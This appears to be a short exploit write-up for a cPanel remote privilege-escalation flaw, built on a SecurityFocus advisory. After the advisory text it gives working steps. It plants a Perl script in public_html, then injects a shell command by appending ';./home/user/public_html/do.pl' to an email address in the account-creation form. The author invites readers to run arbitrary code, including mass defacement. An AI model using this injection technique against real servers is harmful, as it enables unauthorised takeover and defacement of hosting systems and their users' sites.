30 lines
No EOL
1.1 KiB
Text
30 lines
No EOL
1.1 KiB
Text
source: https://www.securityfocus.com/bid/29277/info
|
|
|
|
cPanel is prone to a remote privilege-escalation vulnerability because of an unspecified error.
|
|
|
|
Successfully exploiting this issue allows remote attackers to gain administrative privileges to the affected application and execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the webserver and the underlying system; other attacks are also possible.
|
|
|
|
Test it:
|
|
++++++++++++++++++++++++++
|
|
Step 1
|
|
|
|
Save this file in /home/user/public_html/do.pl .
|
|
#!/usr/bin/perl
|
|
$old='/home/user/public_html/test.txt';
|
|
$new='/home/root/kon.txt';
|
|
rename $old, $new;
|
|
++++++++++++++++++++++++++
|
|
step 2
|
|
|
|
make a text file named test.txt in your public_html directory.
|
|
path will be : /home/user/public_html/test.txt .
|
|
++++++++++++++++++++++++++
|
|
step 3
|
|
|
|
create an account and write ali@hackerz.ir;./home/user/public_html/do.pl in E-mail Address text box
|
|
then click on the "create" button.
|
|
Yes , you can find your file in /home/root/ .
|
|
++++++++++++++++++++++++++
|
|
()()()()()()()()()()()()()
|
|
you can run your own code !(mass defacer, exploit's or everything that u want).
|
|
Enjoy it... |